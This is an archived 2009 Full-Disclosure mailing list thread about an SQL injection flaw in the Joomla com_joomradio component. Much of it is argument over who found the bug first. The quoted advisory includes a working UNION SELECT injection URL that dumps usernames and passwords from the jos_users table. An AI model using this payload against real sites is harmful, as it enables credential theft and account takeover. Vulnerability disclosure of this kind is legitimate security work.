lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Thu, 19 Feb 2009 16:37:26 +0000
From: infolookup@...il.com
To: bobby.mugabe@...hmail.com, full-disclosure-bounces@...ts.grok.org.uk,
	zeus.olimpusklan@...il.com, packet@...ketstormsecurity.org
Cc: bugtraq@...e-h.org, full-disclosure@...ts.grok.org.uk, submit@...w0rm.com,
	bugtraq@...urityfocus.com
Subject: Re: Joomla Component com_joomradio SQL
	Injectionhas

Has this been tested and verified this? 
Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: bobby.mugabe@...hmail.com

Date: Thu, 19 Feb 2009 10:22:48 
To: <zeus.olimpusklan@...il.com>; <packet@...ketstormsecurity.org>
Cc: <bugtraq@...e-h.org>; <full-disclosure@...ts.grok.org.uk>; <submit@...w0rm.com>; <bugtraq@...urityfocus.com>
Subject: Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dear gov-boi,

Please follow the established etiquette of this list by linking to
content on archive.org to establish credibility for alleged
historic content.  Linking to obscure post-dated content on your
own Internet site, that easily can be faked, isn't the best way to
attempt legitimizing your darknet archival endeavours.  Many on
this list are sceptical about your claim regarding the previous
discovery of this important computer security issue, and to be
quite frank find your attempts to discredit the king of gods'
effort to secure this critical piece of Internet infrastructure
known as the joomla joomradio something-or-other.

Mr. Zeus - on behalf of my country I would like to express our
sincere thanks for reporting this severe issue, whether or not it
was previously and independently discovered and reported, and hope
you continue to contribute your research to this list of full
disclosure and helping to make the Internet a safer place for
everyone.

I would like to remind everyone that this list is for disclosure of
information security materials and that the fascist tactics used by
the packetstorm/#darknet crowd as they attempt to once again
monopolize the dissemination of information security materials is
not appreciated here.

All the best to you and yours,
- -bm


On Wed, 18 Feb 2009 17:21:10 -0500 Packet Storm
<packet@...ketstormsecurity.org> wrote:
>Already discovered in June, 2008.
>
>http://packetstormsecurity.org/0806-exploits/joomlajoomradio-
>sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio
>component version 1.0 suffers from a remote SQL injection
>vulnerability.  Authored By <a
>href="mailto:His0k4.hlm[at]gmail.com">His0k4</a>
>
>On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:
>>
>###################################################################
>########
>> # Advisory X
>> # Title: Joomla Component com_joomradio SQL Injection
>> # Author: 0o_zeus_o0 ( Arturo Z. )
>> # Contact: arturo_zamora_c@...mail.com
>> # Website: www.securitybroken.com
>> # Date: 18/02/09
>> # Risk: Medium
>> # Vendor Url: http://ajaxportal.eu/
>> # Affected Software: JoomRadio
>> # autor script:author XrByte <info@....ee>, Grusha
><grusha@...llove.eu>
>>
>##################################################################
>> #
>> #Example:
>>
>##################################################################
>> #htp://
>>
>victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_r
>adio&id=-1UNION
>> SELECT
>>
>user(),concat(username,0x3a,password),user(),user(),user(),user(),u
>ser()
>> FROM jos_users--
>> #
>>
>##################################################################
>> #greetz:
>> #
>> # original advisorie: http://www.securitybroken.com
>>
>##################################################################
>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkmdeSAACgkQhNp8gzZx3sjQnQP8DIyQpyqWn7ItQxusiG4RvifzrUq3
MyvT2uaVgD6bagNiQo2xpBlxjfAC91ikI18ahveZUX2t1NGwvXhgE7XN4TD531cAGXAU
e4D1z+rGmFqfthaDN73PgNr6kHme1TLPszzV7SxzCiZBPaIJZxVKPP0klhZW2Ma5pdOw
DXO/Xkw=
=bmhh
-----END PGP SIGNATURE-----

--
Find schools offering psychology programs online. 3 easy steps!
 http://tagline.hushmail.com/fc/BLSrjkqkOa4cAYuqAs2Rwg48EsDoRE7w8wplgXVKoZaAmTZ8jNnakTcdLkp/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ